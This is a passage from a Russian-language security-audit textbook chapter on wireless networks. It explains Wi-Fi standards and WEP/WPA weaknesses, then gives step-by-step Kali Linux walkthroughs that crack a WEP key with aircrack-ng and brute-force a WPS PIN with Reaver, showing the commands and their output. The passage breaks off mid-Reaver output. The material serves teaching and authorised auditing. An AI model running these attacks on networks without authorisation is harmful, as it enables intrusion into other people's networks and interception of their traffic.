Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Skabtsov_N_V_-_Audit_bezopasnosti_informatsionnykh_sistem_-_2018.pdf
Скачиваний:
101
Добавлен:
24.01.2021
Размер:
9 Mб
Скачать

7 Беспроводные сети

С момента появления беспроводных сетей прошло относительно немного времени, но они сразу же завоевали огромную популярность, и с каждым днем сфера их применения только растет. Желание пользователей становиться более мобильными, не быть привязанными к определенному рабочему месту, а также требования современных бизнес-процессов только усиливают их распространение. Беспроводные сети расширяют границы и позволяют пользователям подключаться к различным ресурсам в таких местах, где раньше этой возможности не было даже в теории.

Мы рассмотрим два вида беспроводных сетей — Wi-Fi и Bluetooh. Хотя они и отличаются, однако с точки зрения информационной безопасности подвержены одинаковым рискам. В современном мире Bluetooh используется для связи друг с другом мобильных телефонов, планшетов, беспроводных клавиатур и многих других устройств. Достаточно только представить, сколько различной информации хранят пользователи на своих мобильных устройствах, чтобы понять, насколько велики риски, связанные с утечкой таких данных.

Краткий обзор Wi-Fi

Wi-Fi — это тип беспроводной передачи данных, который описан в стандарте IEEE 802.11. Эта технология передачи данных используется практически во всех устройствах, от мобильных телефонов до персональных компьютеров и игровых консолей. Благодаря этой технологии пользователи могут подключать различные устройства к глобальной или локальной сети.

Для связи устройства с глобальной сетью необходима так называемая точка доступа. Существует два основных типа точек доступа:

1.На основе аппаратных средств. Обычно это отдельно стоящий беспроводной роутер, открытый для подключения пользователей.

2.На основе программных средств. Также открыт для подключения пользователей по беспроводной сети, однако может включать в себя множество точек доступа.

Краткий обзор Wi-Fi   109

Это позволяет пользователям передвигаться от зоны действия одной точки

кзоне действия другой без потери сигнала и необходимости переподключения

ксети.

Беспроводные сети также используются для связи локальных сетей. Например, когда два офиса организации разделены регионально, вместо того, чтобы использовать проводные магистрали, можно связать их, используя беспроводные технологии типа LAN-to-LAN.

Существует несколько стандартов передачи данных, которые отличаются максимальной скоростью передачи информации, частотой и радиусом действия. Следует заметить, что максимальная скорость и радиус достижимы лишь в идеальных условиях, которые в реальной жизни практически не встречаются.

Протокол

Частота,

Дальность,

Максимальная скорость

 

ГГц

м

передачи данных,

 

 

 

Мб/с

 

 

 

 

Bluetooth

2,4

10

1–3

 

 

 

 

802.11a

5

22

54

 

 

 

 

802.11b

2,4

45

11

 

 

 

 

802.11g

2,4

45

54

 

 

 

 

802.11n

2,4 или 5

30

600 (теоретически)

 

 

 

 

802.11ac

5

48 280

1,3 Гбит/с

 

 

 

 

Ввиду того что в определенном месте устройство пользователя может принимать сигнал от различных точек доступа, их необходимо идентифицировать. Для этого для каждой сети конфигурируют идентификатор (SSID). Если он отрытый, то каждый пользователь может его увидеть, но это не значит, что у него будет возможность подключиться к такой сети. Однако SSID может быть скрытым, и в этом случае пользователь не сможет его увидеть, даже если будет находиться в зоне действия такой сети. Для подключения к такой сети ему придется ввести SSID вручную.

Итак, мы плавно перемещаемся к вопросу аутентификации. Есть два основных метода. Первый, и самый простой, — это открытая сеть. Такие чаще всего устанавливаются в кафе, ресторанах или неопытными пользователями у себя дома. При подключении к такой сети устройство клиента посылает запрос точке доступа, она сравнивает SSID и, в случае его совпадения с ее собственным, отправляет клиенту подтверждение, тем самым разрешая подключение.

Второй тип основывается на общедоступных ключах. В этом случае клиент посылает точке запрос на аутентификацию, а точка отправляет ему специальный пакет. Клиент, используя заранее сконфигурированный общедоступный ключ, шифрует пакет и отправляет его назад. Если точка доступа сможет его расшифровать, используя тот же ключ, то клиент получает разрешение на доступ в сеть.

110    Глава 7  •  Беспроводные сети

Последнее, что нам осталось рассмотреть, прежде чем мы перейдем к вопросам безопасности, — это шифрование. В отличие от проводной сети, где мы знаем точное место прохождения кабелей и можем контролировать доступ к ним, в случае с беспроводными сетями эта задача становится достаточно сложной. Даже если доступ в помещения организации будет строго ограничен, поймать сигнал беспроводной сети можно за пределами зоны контроля, оставаясь при этом совершенно незамеченным и получить доступ ко всем передаваемым данным.

Для того чтобы уменьшить риски, связанные с возможным перехватом данных, вся информация шифруется. Рассмотрим ближе основные методы шифрования данных:

1.WEP — самый старый и уязвимый из протоколов. Он был внедрен на заре беспроводных сетей и очень скоро был скомпрометирован. Однако до сих пор все роутеры поддерживают его, и можно найти сети, в которых он используется по умолчанию.

2.WPA — создан на основе WEP. В этом протоколе были исправлены многие недочеты его предшественника. Использует усовершенствованную систему шифрования и аутентификации.

3.WPA2 — создан на основе WPA и впоследствии должен заменить его. В нем используется шифрование AES и реализована поддержка CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol).

WEP

Несмотря на то что WEP является устаревшим стандартом, он все еще используется в некоторых системах, поэтому остановимся на нем подробнее.

Впервые этот протокол был представлен вместе со стандартом 802.11b и должен был обеспечить такой же уровень безопасности, как и в проводных сетях. Он использует потоковый шифр RC4.

Основными задачами данного протокола были: предотвращение перехвата данных, обеспечение проверки целостности данных и использования общедоступного ключа для шифрования данных перед передачей, а также конфиденциальности и эффективности. Но, к сожалению, со своими задачами он справился недостаточно хорошо.

Разберемся с уязвимостями данного протокола:

использование CRC32 для проверки целостности данных, что позволяет незаметно манипулировать пакетами с данными;

использование векторов инициализации длиной всего в 24 бита — это означает, что при интенсивной нагрузке на сеть их все можно собрать примерно за 5 часов;

WEP    111

ключи могут быть обнаружены при анализе пакетов;подвержен атакам типа «отказ в обслуживании».

Теперь рассмотрим сам процесс получения ключей. Основной частью взлома является сбор векторов инициализации, что осуществляется при помощи перехвата пакетов. Собрав нужное их количество, можно будет приступить к анализу. Есть один важный принцип: чем больше будет собрано пакетов, тем проще их проанализировать. Однако тут есть одна проблема — время. Сбор пакетов может занять достаточное количество времени, особенно если сеть не используется активно. Одним из приемов, применяющихся для обхода этого ограничения, является отправка атакующим специально сформированных пакетов, что создает нужное количество трафика.

Рассмотрим взлом такой сети с использованием инструментов, доступных в Kali Linux.

Прежде чем начать, необходимо учесть, что стандартный драйвер для Wi-Fi- адаптера не позволит собирать нужные данные. Для этого нужен модифицированный драйвер. К счастью, для многих адаптеров они существуют, входят в состав Kali Linux и не требуют отдельной установки. Однако можно столкнуться с ситуацией, когда сниффинг на выбранном адаптере будет невозможен.

Приступим. Вначале определим, какие Wi-Fi-адаптеры нам доступны, выберем среди них подходящий и запустим на нем мониторинг. После этого airmon-ng создаст новый интерфейс, с которым мы и будем работать дальше.

root@kali:~# airmon-ng

 

PHY

Interface

Driver

Chipset

phy0

wlan0

iwl3945

Intel Corporation PRO/Wireless 3945ABG [Golan]

(rev 02)

 

 

root@kali:~# airmon-ng start wlan0

 

Found

2 processes

that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of

time, you may want to run 'airmon-ng check kill'

PID

Name

 

 

1125

NetworkManager

 

1226

wpa_supplicant

 

PHY

Interface

Driver

Chipset

phy0

wlan0

iwl3945

Intel Corporation PRO/Wireless 3945ABG [Golan]

(rev 02)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)

112    Глава 7  •  Беспроводные сети

Теперь посмотрим на список доступных сетей и выберем нужную — ту, которая поддерживает WEP.

root@kali:~# airodump-ng wlan0mon

CH 10 ][ Elapsed: 36 s ][ 2016-11-08 14:15

BSSID

PWR

Beacons

#Data, #/s

CH

MB

ENC

CIPHER

AUTH ESSID

00:1D:7E:E0:47:9C

-34

174

2

0

5

54 . WEP

WEP

 

Come And

Get It

 

 

 

 

 

 

 

 

 

 

F8:1A:67:CC:C6:E6

-55

171

13

0

10

54e.

WPA2 CCMP

PSK

503v

28:28:5D:96:52:C0

-50

147

1

0

10

54e

WPA2 CCMP

PSK

Keenet

ic-6040

 

 

 

 

 

 

 

 

 

 

14:CC:20:0E:87:64

-66

134

1

0

2

54e.

WPA2 CCMP

PSK

buriki

A0:21:B7:6F:1C:3C

-63

45

6

0

7

54e

WPA2 CCMP

PSK

Genisys

D4:BF:7F:07:04:88

-58

164

7

0

9

54e

WPA2 CCMP

PSK

Upvel_04

8b

 

 

 

 

 

 

 

 

 

 

C0:4A:00:86:49:18

-69

145

671

0

11

54e.

WPA2 TKIP

PSK

Savior

B8:A3:86:19:E0:98

-67

68

0

0

3

54e

WPA2 CCMP

PSK

603B

Соберем необходимое количество пакетов (хотя бы 15 000) при помощи airodumpng и проанализируем их.

root@kali:~# airodump-ng -w /root/wifi_dump -c 5 --bssid 00:1D:7E:E0:47:9C wlan0mon

CH 5 ][ Elapsed: 9 mins ][ 2016-11-08 14:29

BSSID

 

PWR RXQ Beacons

#Data, #/s

CH

MB

ENC

CIPHER AUTH ESSID

00:1D:7E:E0:47:9C

-23 100

5192

49680

164

5

54 . WEP

WEP

Come

And Get It

 

 

 

 

 

 

 

 

 

 

BSSID

 

STATION

 

PWR

Rate

Lost

Frames

Probe

00:1D:7E:E0:47:9C

8C:70:5A:2C:40:B8

-35

54 — 6

 

125

50185

 

root@kali:~# aircrack-ng

/root/wifi_dump-01.cap

 

 

 

 

 

Opening /root/wifi_dump-01.cap

 

 

 

 

 

 

 

 

Read 121245 packets.

 

 

 

 

 

 

 

 

 

 

#

BSSID

 

ESSID

 

 

 

Encryption

 

 

 

1

00:1D:7E:E0:47:9C

Come And Get It

 

WEP (49680 IVs)

 

 

Choosing first network as target.

 

 

 

 

 

 

 

Opening /root/wifi_dump-01.cap

 

 

 

 

 

 

 

 

Attack will be restarted

every 5000 captured ivs.

 

 

 

 

 

Starting PTW attack with

49680

ivs.

 

 

 

 

 

 

 

 

 

 

KEY FOUND! [ 89:3A:9F:36:8A ]

 

 

 

 

 

Decrypted correctly: 100%

 

 

 

 

 

 

 

 

WPA    113

WPA

В свое время WPA сменила столь ненадежный WEP. Основными преимуществами стали надежность, производительность, контроль и совместимость.

Однако и у этого протокола есть свои слабые стороны:простые ключи шифрования, задаваемые пользователем;возможность подмены пакетов;

проблемы с протоколом аутентификации MS-CHAP v2.

Подход к взлому сетей, защищенных WPA, кардинально другой, однако и в этом случае доступен хороший инструмент, предназначенный специально для таких целей, — Reaver (входит в состав Kali Linux). Основной принцип работы Reaver — использование уязвимостей в роутерах для сбора информации о WPA.

Когда протокол WPA только появился, у многих пользователей возникли трудности с конфигурацией настроек сети. Для облегчения данной задачи была создана новая технология, известная как безопасная настройка Wi-Fi (Wi-Fi Protected Setup), которая до сих пор поддерживается огромным количеством устройств.

Эта технология должна была облегчить жизнь пользователей. Достаточно было нажать кнопку на роутере, и нужное устройство могло подключиться к сети практически сразу же, без ввода дополнительных данных. Первая проблема заключается в том, что у любого, у кого есть физический доступ к роутеру, автоматически появляется возможность несанкционированного доступа в сеть. Вторая проблема — использование ПИН-кодов.

ПИН-код на роутере похож на ПИН-код телефона или любого другого устройства. Он также состоит только из цифр, к тому же их всего восемь. Когда роутер получает восьмизначный код, он сначала проверяет только первые четыре цифры, и если они верны, то затем и вторые четыре. Это создает большую проблему в сфере безопасности, ведь для преодоления этого барьера надо перебрать всего 11 000 комбинаций, а роутер, в отличие от телефона или банкомата, не заблокирует атакующего после трех неверных попыток.

Посмотрим, как будет выглядеть на практике взлом WPA с использованием Reaver под Kali Linux.

Первые шаги аналогичны. Посмотрим доступные адаптеры и подключим нужный. Далее необходимо выбрать адаптер, поддерживающий WPS.

root@kali:~# airmon-ng

 

PHY

Interface

Driver

Chipset

phy0

wlan0

iwl3945

Intel Corporation PRO/Wireless 3945ABG [Golan]

(rev 02)

root@kali:~# airmon-ng start wlan0

114    Глава 7  •  Беспроводные сети

Found 2 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want

to run 'airmon-ng check kill'

PID Name

 

 

 

 

1125 NetworkManager

 

 

 

1226 wpa_supplicant

 

 

 

PHY

Interface

Driver

 

 

Chipset

phy0

wlan0

iwl3945

 

 

Intel Corporation PRO/Wireless 3945ABG [Golan]

(rev 02)

 

 

 

 

 

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

 

(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# wash -i wlan0mon --ignore-fcs

Wash v1.5.2 WiFi Protected

Setup Scan Tool

Copyright (c) 2011, Tactical Network

Solutions, Craig Heffner <cheffner@tacnetsol.

com>

 

 

 

 

 

mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID

 

Channel

RSSI

WPS

Version WPS Locked ESSID

--------------------------------------------------------------

28:28:5D:ED:E7:88

1

-69

1.0

No Keenetic-5706

AC:9E:17:8C:9D:4C

1

-91

1.0

No ASUS

30:B5:C2:BF:A4:12

2

-71

1.0

No kakaha

E8:DE:27:D7:86:AE

2

-86

1.0

No b504g

00:18:E7:FE:C4:AC

3

-89

1.0

No 804v

A0:21:B7:B0:15:3E

3

-87

1.0

No Victoria

C4:3D:C7:85:7E:AE

5

-70

1.0

No Exhibitionist

Выберем нужную сеть — с технической точки зрения все они подходят, — а затем подберем ПИН.

root@kali:~# reaver -i wlan0mon -b 30:B5:C2:BF:A4:12

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol. com>

mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+]Waiting for beacon from 30:B5:C2:BF:A4:12

[+]Associated with 30:B5:C2:BF:A4:12 (ESSID: kakaha)

[+]Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [P] E-Nonce: 9c:28:96:b2:4c:54:1f:9d:a9:b6:c4:ef:a0:de:83:72

[P] PKE: 59:cc:01:4a:e7:0f:03:52:3c:71:40:80:92:7f:37:83:de:41:9a:d9:8c:df:b0:96:cb :dd:3b:7d:2e:9e:28:12:0a:12:81:52:82:1b:91:24:8e:67:9a:02:5e:05:01:24:a0:ca:de:cb:b 2:d2:59:2c:69:4a:11:a0:0c:6b:ce:45:78:d8:43:2d:bc:e1:78:a6:54:8c:a8:c2:3f:38:10:41: b9:8c:5e:ea:74:42:a7:af:d8:21:b5:e1:39:54:1b:d5:63:b0:7f:2f:d3:a6:f0:99:61:77:c0:af :7a:95:cc:1c:2b:d6:51:94:30:93:28:86:39:a0:c3:bc:b8:47:85:1c:39:46:a6:63:23:03:91:4 d:ca:c0:72:32:f9:a3:46:39:7d:57:57:97:7a:73:ec:c5:ce:8a:0e:aa:f0:b9:e3:02:76:ca:42: 86:38:c4:01:a8:25:ba:db:93:c1:2c:1c:41:c7:99:48:2d:af:78:dd:73:e8:d7:ec:e4:c8:a1:8b